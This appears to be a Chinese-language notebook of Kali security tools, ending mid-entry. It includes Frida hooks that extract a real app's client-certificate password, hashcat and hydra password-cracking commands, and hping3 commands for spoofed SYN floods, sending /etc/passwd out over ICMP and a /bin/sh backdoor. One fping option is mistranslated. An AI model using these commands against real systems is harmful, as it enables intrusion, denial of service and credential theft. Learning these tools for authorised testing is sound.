与ping要等待某一主机连接超时或发回反馈信息不同，fping给一个主机发送完数据包后，马上给下一个主机发送数据包，实现多主机同时ping。如果某一主机ping通，则此主机将被打上标记，并从等待列表中移除，如果没ping通，说明主机无法到达，主机仍然留在等待列表中，等待后续操作。

fping工具的参数说明：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83

-a
Lists targets that responded
显示可ping通的目标

-A
Lists targets by address instead of hostname
将目标以ip地址的形式显示

-b <num>
Sends <num> bytes of data per ICMP packet (default 56)
ping 数据包的大小。（默认为56）

-B <f>
Tells fping to wait <f> times longer for a reply after each successive failed request (default 1.5)
设置指数反馈因子到f

-c <num>
Number of Pings to send to each target (default 1)
ping每个目标的次数 (默认为1)

-C <num>
Same as above but prints additional statistics for each host
同-c，返回的结果为冗长格式

-e
Displays elapsed time on return packets
显示返回数据包所费时间

-f <file>
Reads the target list from <file> (use "-" for standard input) (only if no -g specified)
从文件获取目标列表( - 表示从标准输入)(不能与 -g 同时使用)

-g
Tells fping to generate a target list by specifying the start and end address (ex. ./fping -g 192.168.1.0 192.168.1.255) or an IP/subnet mask (ex. ./fping -g 192.168.1.0/24)
通过指定开始和结束地址来生成目标列表（例如：./fping –g 192.168.1.0 192.168.1.255）或者一个IP/掩码形式（例如：./fping –g 192.168.1.0/24）

-i <num>
Interval (in milliseconds) to wait between Pings (default 25)
设置ip的TTL值 (生存时间)

-l
Sends Pings forever
循环发送ping

-m
Pings multiple interfaces on target host
ping目标主机的多个网口

-n
Displays targets by name (-d is equivalent)
将目标以主机名或域名显示(等价于 -d )

-p <num>
Interval (in milliseconds) between Pings to an individual target (in looping and counting modes, default 1000)
对同一个目标的ping包间隔(毫秒) (在循环和统计模式中，默认为1000)

-q
Doesn't show per-target/per-Ping results
安静模式(不显示每个目标或每个ping的结果)

-Q <num>
Same as -q, but show summary every <num> seconds
同-q, 但是每n秒显示信息概要

-r <num>
When a host doesn't respond, retries the host <num> times (default 3)
当ping失败时，最大重试次数(默认为3次)

-s
Displays summary statistics
打印最后的统计数据

-t <num>
Timeout (in milliseconds) for individual targets (default 500)
单个目标的超时时间(毫秒)(默认500)

-u
Displays targets that are unreachable
显示不可到达的目标

-v
Displays version number
显示版本号

实例:

fsstat

描述：

显示文件系统的一般详细信息。
  sstat显示与文件系统关联的详细信息。 该命令的输出是文件系统特定的。 至少要给出元数据值（索引节点号）和内容单元（块或簇）的范围。 还给出了超级块的详细信息，例如安装时间和功能。 对于使用组（FFS和EXT2FS）的文件系统，列出了每个组的布局。
对于FAT文件系统，FAT表以压缩格式显示。 请注意，数据位于扇区而不是簇中。

参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

-t type
	仅打印文件系统类型。

-f fstype
	指定文件系统类型。 使用“ -f列表”列出支持的文件系统类型。 如果未给出，则使用自动检测方法。

-i imgtype
	标识图像文件的类型，例如原始文件。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。

-o imgoffset
	文件系统在映像中开始的扇区偏移量。

-b dev_sector_size
	基础设备扇区的大小（以字节为单位）。 如果未给出，则使用图像格式的值（如果存在）或假定为512字节。

-v
	将调试语句的详细输出输出到stderr

-V
	打印版本信息

仅仅支持磁盘文件

frida

Frida自吐证书密码

原创 tale Tide安全团队 2022-04-27 17:03

双向认证APP自吐密码

在许多业务非常聚焦比如行业应用、银行、公共交通、游戏等行业，C/S架构中服务器高度集中，对应用的版本控制非常严格，这时候就会在服务器上部署对app内置证书的校验代码。
抓包出现如下提示时，我们确定出此APP为服务器校验app客户端证书

对于此类APP抓包而言通常需要完成两项内容：

1

找到证书文件找到证书密码

服务器对客户端进行校验过程中，客户端将证书公钥发送给服务器，以及从服务器获取session和私钥解密过程中，需要API进行操作，API存在于java层框架内，所以hook框架层代码java.security.KeyStore，使密码自吐

-

1

# frida -U -f cn.soulapp.android -l ssl.js  --no-pause

密码}%2R+\OSsjpP!w%X
然后首先使用常规方式解压搜索app包里的证书文件。一般apk进行解包，直接过滤搜索后缀名为p12的文件即可，一般常用的命令为tree -NCfhl |grep -i p12，直接打印出p12文件的路径.

如果在安装包内找不到证书的话，也可以进行hookjava.io.Fil

-

1

# android hooking watch class_method java.io.File.$init

通过hook也可以找到该证书文件。

-

1

# objection -g cn.soulapp.android explore --startup-command "android hooking watch class_method java.io.File.$init  --dump-args"

使用抓包工具点击导入证书

密码随意设置

然后进去之后导入p12证书和密码（自吐出的密码），host和port输入*

可以看到可以成功抓到了数据包

hook抓包

1、首先确定使用的框架，主流框架okhttp、HttpURLconnection
使用objection打印内存中所有的类

1

# android hooking list classes

然后搜索过滤类文件中值得怀疑的框架

1

.objection # cat objection.log |grep -i volley.objection # cat objection.log |grep -i okhttp.objection # cat objection.log |grep -i

找到APP使用的框架后，最后通过frida加载js脚本来进行绕过。

ZenTracer

批量hook查看调用轨迹的工具ZenTracer

1

# git clone https://github.com/hluwa/ZenTracer

点击Action之后，会出现匹配模板（Match RegEx）和过滤模板（Black RegEx）,将M:java.net.HttpURLConnection填入后会将该类的所有方法进行hook并运行

同时手机点击登录、注册等功能模块时，发现经过了该方法

java.net.HttpURLConnection.getFollowRedirects()：

然后使用objectionhook该方法

-

1

# android hooking watch class_method java.net.HttpURLConnection.getFollowRedirects --dump-args --dump-return --dump-backtrace

根据打印出的

1

com.cz.babySister.c.a.a(HttpClients.java:22)

直接定位到了收发包函数的地址，然后查看收发包的内容如下：

-

1

# android hooking watch class_method com.cz.babySister.c.a.a --dump-args --dump-backtrace --dump-return

强混淆APP

使用工具OkHttpLogger-Frida
1、首先将okhttpfind.dex 拷贝到手机 /data/local/tmp/目录下

-

1

# adb push okhttpfind.dex /data/local/tmp/# chmod 777 *

2、执行命令启动frida -U -l okhttp_poker.js -f com.example.demo –no-pause 可追加 -o [output filepath]保存到文件

-

1

# frida -U -l okhttp_poker.js -f org.sfjboldyvukzzlpp --no-pause

然后复制被混淆后的类名，粘贴到okhttp_poker.js文件中，重新运行后运行hold()开启hook拦截，然后操作App后，会出现拦截的内容如下

-

1

# nano okhttp_poker.js

当然除了ZenTracer，也可以直接使用objection工具进行批量hook，
首先将怀疑的类复制保存到文件中，并在保存内容前加上android hooking watch class

-

1

# android hooking list classes# objection -g com.cz.babySister explore -c "/root/Desktop/2.txt"

1

参考资料https://www.anquanke.com/post/id/197657https://bbs.pediy.com/thread-258776.html

G

GParted

磁盘扩展⼯具

GParted (Gnome Partition Editor)是一种非常小巧自启动运行光盘，采用X.org，轻量级的Fluxbox窗口管理器，以及最新的2.6 Linux内核建构。其中包含的GParted硬盘分区工具，作为系统维护盘非常有用。

还能进行数据恢复和分区

guymager

在数字取证中，经常需要对磁盘制作镜像，以便于后期分析。Kali Linux提供一款轻量级的磁盘镜像工具Guymager。该工具采用图形界面化方式，提供磁盘镜像和磁盘克隆功能。它不仅生成dd的镜像，还能生成EWF和AFF镜像。在生成过程中，渗透测试人员不仅可以采用两次读操作验证数据的正确性，还可以对镜像文件进行额外的校验。由于采用多线和多处理机技术，该工具可以极大提升读取和压缩速度。

在生成一个磁盘的镜像并将其通过网络存放在另一台电脑的过程中，你仅仅需要两个工具：通用的 GNU/Linux 工具 dd/dcfldd。

guymager 是将 dd 与 dcfldd 命令转换为图形化接口，方便取证人员及事件恢复人员建立镜像，但其只支持 Linux 系统；使用者可选择利用
dd 或是 dcfldd 來制作镜像、可透过 MD5 或是 SHA-1 來验证镜像、镜像可利用 gzip/bzip2 进行压缩等。

GPG

GPG简介

GPG代表GNU Private Guard，它是一个命令行实用程序，用于使用对称或公钥加密对数据文件或文件夹进行加密和解密。 GPG是GPGP授权替代PGP加密软件套件。 GPG也由OpenPGP编译系统使用。

加密使用对称密钥

这里我有一个名为“test.txt”的文件，我将加密然后用对称密钥解密，并将解密的文本打印到另一个名为“output.txt”的文件中。

运行以下命令使用对称密钥加密文件test.txt。 选项“-c”表示GPG使用对称密钥。

因此，一旦密码输入正确，就会创建一个名为“test.txt.gpg”的文件。 这是加密文件。 以下图像显示加密前后的文件。您可以看到加密的文本是不可读的格式。

注意:原来那个txt还是可读的

使用以下命令解密加密文件

如果是当前用户的话都不需要输入密码

公钥加密

在这里，我们将使用GPG的公钥/私钥加密机制加密一组文件。 它涉及创建一个不应与任何人共享的私钥，以及必须与要向您发送加密数据的用户共享的公钥。

首先，我们必须将文件打包成压缩文件夹。 这里我有一个名为“enctest”的目录，其中有三个文件test1.txt到test3.txt。我们将压缩此目录tar.gz文件。 我将使用以下命令创建压缩的tar.gz存档：

这将创建一个文件“files.tar.gz”。 我们现在必须生成公钥/私钥对。 运行以下命令生成密钥：

跟详细的设置私钥

记住，这只需要完成一次，任何数量的文件和文件夹都可以使用此密钥进行加密。 一旦你键入这个命令，将会询问各种各样的问题。 问题将是：

• 什么样的加密使用？ 我选择1是RSA和RSA。
• 什么是关键尺寸？ 我选择2048，你可以选择1024和4096范围内的任意大小。
• 钥匙什么时候过期？ 我选择了0，这意味着密钥永远不会过期。 但如果您希望在特定的时间过期，可以提供数天，数周或数年。

将会询问其他类似密码的内容，您将被提示输入两次。 确保你使用强大的，并记住密码。 此外，您的凭据也将被使用。 我在这里使用的凭据（如下所示）仅用于测试。 建议您使用您的真实凭据，如姓名，电子邮件ID，并提供一些评论。

一旦你输入密码，它就开始生成密钥。 它会要求你做一些工作。 建议移动鼠标或键入某些东西或使用驱动器打开一些文件。 它将使用此工作来生成随机位。 您可能需要多次执行此操作。 我的输出如下所示：

这里有两个重要的事情：提供强大的密码，并确保记住你的密码

现在生成密钥，我们现在必须导出公用密钥文件，以便在其他系统上导入，或通过电子邮件发送。 要启动导出，请使用以下命令：

还建议备份私钥。 我们可以使用gpg来做到这一点。 要进行备份，请使用以下命令：

1

gpg --armor --output file-enc-privkey.asc --export-secret-keys 'cdxiaodong'

这里的文件“file-enc-privkey.asc”将安全地保存私钥的备份。 一旦导出和密钥备份完成，我们现在可以加密和解密.tar.gz文件。 使用以下命令加密：

记住在上述命令中将“cdxiaodong”更改为在密钥生成期间给出的名称，否则加密将失败。 当命令成功运行时，将创建一个名为“files.tar.gz.gpg”的加密文件。

现在我们可以使用以下命令解密tar.gz存档。 它将使用私钥和密码来解密并提供解密的文件夹。 使用以下命令解密：

1

gpg --output output.tar.gz --decrypt files.tar.gz.gpg

上述命令将要求密码，然后解密加密的文件，并创建一个名为“output.tar.gz”的压缩文件，然后可以使用tar将其解压缩到文件夹以获取文件。

H

Hardware Locality lstopo

• 硬件局部性lstopo

我也不知道这个东西是干啥的

hashcat

HashCat系列软件在硬件上支持使用CPU、NVIDIA GPU、ATI GPU来进行密码破解。在操作系统上支持Windows、Linux平台，并且需要安装官方指定版本的显卡驱动程序，如果驱动程序版本不对，可能导致程序无法运行。

HashCat主要分为三个版本：Hashcat、oclHashcat-plus、oclHashcat-lite。这三个版本的主要区别是：HashCat只支持CPU破解。oclHashcat-plus支持使用GPU破解多个HASH，并且支持的算法高达77种。oclHashcat-lite只支持使用GPU对单个HASH进行破解，支持的HASH种类仅有32种，但是对算法进行了优化，可以达到GPU破解的最高速度。如果只有单个密文进行破解的话，推荐使用oclHashCat-lite。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

-m   指定哈希类型
-a   指定攻击模式，有5中模式
    0 Straight（字典破解）
    1 Combination（组合破解）
    3 Brute-force（掩码暴力破解）
    6 Hybrid dict + mask（混合字典+掩码）
    7 Hybrid mask + dict（混合掩码+字典）
-o   输出文件
-stdout  指定基础文件
-r  指定规则文件
--force 强制进行破解
--show  显示破解结果
 
-V   打印出版本
-h   查看帮助

-m 参数的一些哈希类型.

使用Hashcat生成字典

rules目录下存放着生成字典的各种规则

我们在当前目录下将基础信息保存在 base.txt文件中，–stdout 指定基础信息文件，-r 指定规则文件，-o输出成文件。

输出成test.txt文件

1

hashcat64.exe --stdout base.txt -r rules\dive.rule -o test.txt

使用Hashcat破解LM Hash和NTLM Hash

root对应的LM和NLM哈希如下

破解LM Hash

LM Hash的模式是3000

1

hashcat64.exe -m 3000 d480ea9533c500d4aad3b435b51404ee pass.txt --force

爆破完成后，可以使用 –show 参数查看结果 ，但是要注意爆破LM Hash的结果默认会大写

破解NTLM Hash

NTLM Hash的模式是1000

1

hashcat64.exe -m 1000 329153f560eb329c0e1deea55e88a1e9 pass.txt --force

爆破完成后，可以使用 –show 参数查看结果

使用Hashcat破解Net-NTLMHash

1

hashcat64.exe -m 5600 xie::WIN7:77effc5381037df8:b6b777ced0128e3f587fe08b98853e13:010100

hashid

描述：

识别用于加密数据的不同类型的哈希。
  hashID是用Python 3.x编写的工具，它支持使用正则表达式识别超过210种唯一的哈希类型。
  它能够识别单个散列、解析文件或读取目录中的文件并识别其中的散列。hashID还能够在其输出中包含相应的hashcat模式和/或JohnTheRipper格式。尽管hashID是用Python 3编写的。但它也应该适用于Python 2.7。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

-e,--extended
	列出所有可能的散列算法，包括加密密码

-m,--mode
	在输出中包括相应的hashcat模式

-j,--john
	在输出中包括相应的JohnTheRipper格式

-o FILE,--outfile FILE
	将输出写入文件（默认值：STDOUT）

-h,--help
	显示帮助信息并退出

--version
	显示程序的版本信息并退出

hash-identifier

在测试过程中我们经常会遇到一些哈希值需用通过hashcat进行解密，但是在使用hashcat解密是需要指定使用的加密算法，如何确认加密算法是一个比较棘手的问题。
hash-identifier工具可以通过密文识别加密算法，工具可在github下载，kali系统默认安装了该工具，工具运行如下：

分析密文方式如下：

1

a3090f99d2ce0958fa0939e99861203510fe54958a937abaa0bae06d

1

4194d1706ed1f408d5e02d672777019f4d5385c766a8c6ca8acba3167d36a7b9

1

230eb00c8b4bc080ccdf6e7da3075aff

hfind(未完成)

描述：

在哈希数据库中查找哈希值。
  hfind使用二进制搜索算法在数据库中查找哈希值。 这样一来，您就可以轻松创建哈希数据库，并确定文件是否已知。 它可以与NIST国家软件参考库（NSRL）和“ md5sum”的输出一起使用。
  在“ hfind”可以使用数据库之前，必须使用“ -i”选项创建索引文件。
  需要此工具以提高效率。 大多数基于文本的数据库没有固定长度的条目，有时不进行排序。 hfind工具将创建一个已排序并具有固定长度条目的索引文件，这允许使用二进制搜索算法而不是线性搜索（例如’grep’）进行快速查找。

参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

-i db_type
	为数据库创建索引文件。 必须先执行此步骤，然后才能执行查找。 'db_type'参数指定数据库类型（即nsrl-md5或md5sum）。 请参阅以下部分。

-f lookup_file
	指定每行包含一个哈希值的文件的位置。 这些哈希将在数据库中查找。

-e
	扩展模式。 除了名称之外，还会打印其他信息。 （并不适用于所有哈希数据库类型）。

-q
	快速模式。 如果没有找到哈希，则显示0，否则显示1，而不是显示带有哈希的相应信息。 如果使用此标志，则一次只能给出一个散列。

-V
	显示版本信息

db_file
	哈希数据库文件的位置。

[hashes]
	查找的哈希值。 如果命令行上未提供它们，则使用STDIN。 如果SHA-1和MD5哈希都存在索引文件，则可以在运行时给出两种类型的哈希。

INDEX FILE
	hfind使用索引文件对哈希值执行二进制搜索，这比使用'grep'进行线性搜索要快得多，后者将执行线性搜索。在使用哈希数据库之前，必须创建相应的索引文件。 这可以通过hfind的“ -i”选项来完成。
	生成的索引文件将根据数据库文件名命名。该名称将包含原始名称、哈希类型(sha1或md5)和'.idx'。例如，创建NIST NSRL的MD5哈希索引会得到'NSRLFile.txt-md5。和SHA-1索引的结果是'NSRLFile.txt-sha1.idx'。
	该文件有两列。 每个条目均按第一列（即哈希值）排序。 第二列具有原始文件中相应条目的字节偏移。 因此，当在索引中找到散列时，将记录偏移量，然后“ hfind”将查找原始数据库中的条目。
	以下输入类型是有效的。对于NSRL，可以使用' NSRL -md5'和' NSRL -sha1'。区别在于索引是根据哪个哈希值排序的。“md5sum”值还可以用于对“自制”数据库进行排序和索引。“hfind”可以采用两种常见格式的数据:
		MD5 (test.txt) = 76b1f4de1522c20b67acc132937cf82e
  		and
        76b1f4de1522c20b67acc132937cf82e        test.txt

hping3

1.hping3

hping 是面向命令行的用于生成和解析TCP/IP协议数据包汇编分析的开源工具。

目前最新版是hping3，它支持TCP，UDP，ICMP，和RAW-IP协议，具有跟踪路由模式，能够在覆盖的信道之间发送文件以及许多其他功能.

hping3是安全审计,防火墙测试等工作的标配工具,haping优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机经行细致的探测.

2.hping3用法

格式:

1

hping3 host [options]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

-h	–help	显示帮助
-v	–version	显示版本
-c	–count	发送数据包的数目
-i	–interval	发送数据包间隔的时间 (uX即X微秒, 例如： -i u1000)
–fast	等同 -i u10000 (每秒10个包)
–faster	等同 -i u1000 (每秒100个包)
–flood	尽最快发送数据包，不显示回复。
-n	–numeric	数字化输出，象征性输出主机地址。
-q	–quiet	安静模式
-I	–interface	网卡接口 (默认路由接口)
-V	–verbose	详细模式
-D	–debug	调试信息
-z	–bind	绑定ctrl+z到ttl(默认为目的端口)
-Z	–unbind	取消绑定ctrl+z键
–beep	对于接收到的每个匹配数据包蜂鸣声提示

3.模式选择

1
2
3
4
5
6
7

编号	模式	描述
default mode	TCP	默认模式是 TCP
-0 或 --rawip	RAWIP模式，原始IP模式	在此模式下HPING会发送带数据的IP头。即裸IP方式。使用RAWSOCKET方式。
-1 或 --icmp	ICMP模式	此模式下HPING会发送IGMP应答报，你可以用–ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。
-2 或 --udp	UDP 模式	缺省下，HPING会发送UDP报文到主机的0端口，你可以用–baseport --destport --keep选项指定其模式。
-8 或 --scan	SCAN mode	扫描模式 指定扫描对应的端口。Example: hping --scan 1-30,70-90 -S www.target.host // 扫描
-9 或 --listen	listen mode	监听模式

4. IP 模式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

参数缩写	参数	描述
-a	–spoof	spoof source address //源地址欺骗。伪造IP攻击，防火墙就不会记录你的真实IP了，当然回应的包你也接收不到了。
–rand-dest	random destionation address mode. see the man. // 随机目的地址模式。详细使用 man 命令
–rand-source	random source address mode. see the man. // 随机源地址模式。详细使用 man 命令
-t	–ttl	ttl (默认 64) //修改 ttl 值
-N	–id	id (默认 随机) // hping 中的 ID 值，缺省为随机值
-W	–winid	使用win* id字节顺序 //使用winid模式，针对不同的操作系统。UNIX ,WINDIWS的id回应不同的，这选项可以让你的ID回应和WINDOWS一样。
-r	–rel	相对id字段(估计主机流量) //更改ID的，可以让ID曾递减输出，详见HPING-HOWTO。
-f	–frag	拆分数据包更多的frag. (may pass weak acl) //分段，可以测试对方或者交换机碎片处理能力，缺省16字节。
-x	–morefrag	设置更多的分段标志 // 大量碎片，泪滴攻击。
-y	–dontfrag	设置不分段标志 // 发送不可恢复的IP碎片，这可以让你了解更多的MTU PATH DISCOVERY。
-g	–fragoff	set the fragment offset // 设置断偏移。
-m	–mtu	设置虚拟最大传输单元, implies --frag if packet size > mtu // 设置虚拟MTU值，当大于mtu的时候分段。
-o	–tos	type of service (default 0x00), try --tos help // tos字段，缺省0x00，尽力而为？
-G	–rroute	includes RECORD_ROUTE option and display the route buffer // 记录IP路由，并显示路由缓冲。
–lsrr	松散源路由并记录路由 // 松散源路由
–ssrr	严格源路由并记录路由 // 严格源路由
-H	–ipproto	设置IP协议字段，仅在RAW IP模式下使用 //在RAW IP模式里选择IP协议。设置ip协议域，仅在RAW ip模式使用。

5. ICMP 模式

1
2
3
4
5
6
7
8

参数缩写	参数	描述
-C	–icmptype	icmp类型(默认echo请求) // ICMP类型，缺省回显请求。
-K	–icmpcode	icmp代号(默认0) // ICMP代码。
–force-icmp	发送所有icmp类型(默认仅发送支持的类型) // 强制ICMP类型。
–icmp-gw	设置ICMP重定向网关地址(默认0.0.0.0) // ICMP重定向
–icmp-ts	等同 --icmp --icmptype 13 (ICMP 时间戳) // icmp时间戳
–icmp-addr	等同 --icmp --icmptype 17 (ICMP 地址子网掩码) // icmp子网地址
–icmp-help	显示其他icmp选项帮助 // ICMP帮助

6. UDP/TCP 模式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

参数缩写	参数	描述
-s	–baseport	base source port (default random) // 缺省随机源端口
-p	–destport	[+][+] destination port(default 0) ctrl+z inc/dec // 缺省随机源端口
-k	–keep	keep still source port // 保持源端口
-w	–win	winsize (default 64) // win的滑动窗口。windows发送字节(默认64)
-O	–tcpoff	set fake tcp data offset (instead of tcphdrlen / 4) // 设置伪造tcp数据偏移量(取代tcp地址长度除4)
-Q	–seqnum	shows only tcp sequence number // 仅显示tcp序列号
-b	–badcksum	(尝试)发送具有错误IP校验和数据包。许多系统将修复发送数据包的IP校验和。所以你会得到错误UDP/TCP校验和。
-M	–setseq	设置TCP序列号
-L	–setack	设置TCP的ack ------------------------------------- (不是 TCP 的 ACK 标志位)
-F	–fin	set FIN flag
-S	–syn	set SYN flag
-R	–rst	set RST flag
-P	–push	set PUSH flag
-A	–ack	set ACK flag ------------------------------------- （设置 TCP 的 ACK 标志 位）
-U	–urg	set URG flag // 一大堆IP抱头的设置。
-X	–xmas	set X unused flag (0x40)
-Y	–ymas	set Y unused flag (0x80)
–tcpexitcode	使用last tcp-> th_flags作为退出码
–tcp-mss	启用具有给定值的TCP MSS选项
–tcp-timestamp	启用TCP时间戳选项来猜测HZ/uptime

7.Common //通用设置

1
2
3
4
5
6
7
8
9
10
11
12
13

参数缩写	参数	描述
-d	–data	data size (default is 0) // 发送数据包大小，缺省是0。
-E	–file	文件数据
-e	–sign	添加“签名”
-j	–dump	转储为十六进制数据包
-J	–print	转储为可打印字符
-B	–safe	启用“安全”协议
-u	–end	告诉你什么时候–file达到EOF并防止倒回
-T	–traceroute	traceroute模式(等同使用 --bind 且–ttl 1)
–tr-stop	在traceroute模式下收到第一个不是ICMP时退出
–tr-keep-ttl	保持源TTL固定，仅用于监视一跳
–tr-no-rtt	不要在跟踪路由模式下计算/显示RTT信息 ARS包描述（新增功能，不稳定）ARS packet description (new, unstable)
–apd-send	发送APD描述数据包(参见docs / APD.txt)

8. Hping3 功能

8.1 防火墙测试

使用Hping3指定各种数据包字段，依次对防火墙进行详细测试。请参考：http://0daysecurity.com/articles/hping3_examples.html

测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击（DoS attack）。例如，以LandAttack方式测试目标防火墙（Land Attack是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接）。

hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

8.2 端口扫描

Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。以下示例可用于探测目标机的80端口是否开放：

hping3 -I eth0 -S 192.168.10.1 -p 80
其中-I eth0指定使用eth0端口，-S指定TCP包的标志位SYN，-p 80指定探测的目的端口。

hping3支持非常丰富的端口探测方式，nmap拥有的扫描方式hping3几乎都支持（除开connect方式，因为Hping3仅发送与接收包，不会维护连接，所以不支持connect方式探测）。而且Hping3能够对发送的探测进行更加精细的控制，方便用户微调探测结果。当然，Hping3的端口扫描性能及综合处理能力，无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。

8.3 Idle扫描

Idle扫描（Idle Scanning）是一种匿名扫描远程主机的方式，该方式也是有Hping3的作者Salvatore Sanfilippo发明的，目前Idle扫描在Nmap中也有实现。

该扫描原理是：寻找一台idle主机（该主机没有任何的网络流量，并且IPID是逐个增长的），攻击端主机先向idle主机发送探测包，从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包（此处假设为SYN包），此时如果远程主机的目的端口开放，那么会回复SYN/ACK，此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包，获取其IPID。那么对比两次的IPID值，我们就可以判断远程主机是否回复了数据包，从而间接地推测其端口状态。

8.4 拒绝服务攻击

使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包。

hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
其他攻击如smurf、teardrop、land attack等也很容易构建出来。

8.5 文件传输

Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现方式是开启监听端口，对检测到的签名（签名为用户指定的字符串）的内容进行相应的解析。在接收端开启服务：

hping3 192.168.1.159–listen signature –safe –icmp
监听ICMP包中的签名，根据签名解析出文件内容。

在发送端使用签名打包的ICMP包发送文件：

hping3 192.168.1.108–icmp ?d 100 –sign signature –file /etc/passwd
将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节（-d 100），发送签名为signature(-sign signature)。

8.6 木马功能

如果Hping3能够在远程主机上启动，那么可以作为木马程序启动监听端口，并在建立连接后打开shell通信。与netcat的后门功能类似。

示例：本地打开53号UDP端口（DNS解析服务）监听来自192.168.10.66主机的包含签名为signature的数据包，并将收到的数据调用/bin/sh执行。

在木马启动端：

hping3 192.168.10.66–listen signature –safe –udp -p 53 | /bin/sh
在远程控制端：

echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 –udp –sign siganature –file ./test.cmd
将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口，包数据长度为100字节。

9. 端口扫描测试

实验靶机:

1
2
3

Windows7   IP: 192.168.214.132

Metasploitable   IP: 192.168.214.133

在Kali端输入命令:

1

sudo hping3 -I eth0 -S 192.168.214.133 -p 80

说明通信成功,80端口已开启

hydra

一、hydra简介

Hydra是一款非常强大的暴力破解工具，它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具，主要目的是：展示安全研究人员从远程获取一个系统认证权限。

目前该工具支持以下协议的爆破：

1
2

AFP，Cisco AAA，Cisco身份验证，Cisco启用，CVS，Firebird，FTP，HTTP-FORM-GET，HTTP-FORM-POST，HTTP-GET，HTTP-HEAD，HTTP-PROXY，HTTPS-FORM- GET，HTTPS-FORM-POST，HTTPS-GET，HTTPS-HEAD，HTTP-Proxy，ICQ，IMAP，IRC，LDAP，MS-SQL，MYSQL，NCP，NNTP，Oracle Listener，Oracle SID，Oracle，PC-Anywhere， PCNFS，POP3，POSTGRES，RDP，Rexec，Rlogin，Rsh，SAP / R3，SIP，SMB，SMTP，SMTP枚举，SNMP，SOCKS5，SSH（v1和v2），Subversion，Teamspeak（TS2），Telnet，VMware-Auth ，VNC和XMPP。
对于 HTTP，POP3，IMAP和SMTP，支持几种登录机制，如普通和MD5摘要等

二、hydra使用方法

1

语法：Hydra 参数 IP 服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14

参数：
-l login 小写，指定用户名进行破解
-L file 大写，指定用户的用户名字典
-p pass 小写，用于指定密码破解，很少使用，一般采用密码字典。
-P file 大写，用于指定密码字典。
-e ns 额外的选项，n：空密码试探，s：使用指定账户和密码试探
-M file 指定目标ip列表文件，批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数，默认是16
-w time 设置最大超时时间，单位
-v / -V 显示详细过程
-R 恢复爆破（如果破解中断了，下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。）
-x 自定义密码。

1
2
3
4
5
6
7
8

service：指定服务名，支持的服务跟协议有：telnet，ftp，pop3等等。
注意：
1.自己创建字典,然后放在当前的目录下或者指定目录。
2.参数可以统一放在最后，格式比如hydra ip 服务 参数。
3.如果能确定用户名一项时候，比如web登录破解，直接用 -l就可以，然后剩余时间破解密码。
4.缺点，如果目标网站登录时候需要验证码就无法破解。
5.man hydra最万能。
6.或者hydra -U http-form等查看具体帮助。

三、案例分析

暴破ssh登录密码

环境介绍

1
2
3
4

攻击机：kali
装有hydra工具
靶机：192.168.154.131
安装ssh服务，正常运行

为了测试方便，我们创建两个简单的字典文件，如下：

开始爆破

根据命令参数，组织参数格式如下：

1

root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

破解成功

因为字典数量比较少，我们可以轻易的破解成功，但是实际情况下，我们可能需要很久。

三、各种协议破解汇总

FTP协议破解

1
2
3

破解ftp：
 
hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v

http协议破解

1
2
3
4
5
6
7
8
9
10
11
12
13

get方式提交，破解web登录：
 
hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/
hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php
 
post方式提交，破解web登录：
 
hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
 
 
#/index.php …这个是登录的 url
#后门是POST的数据 其中的用户名密码使用 USER PASS 来代替
#然后是如果登录出错 会出现的字符 。。。然后开始破解

https协议破解

1
2
3

破解https
 
hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https

路由器破解

1
2
3
4

hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 为尝试破解的用户名。
 
# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成，长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式（协议）

http-proxy协议破解

1
2
3

破解http-proxy：
 
hydra -l admin -P 字典.txt http-proxy://IP地址

smb破解

1
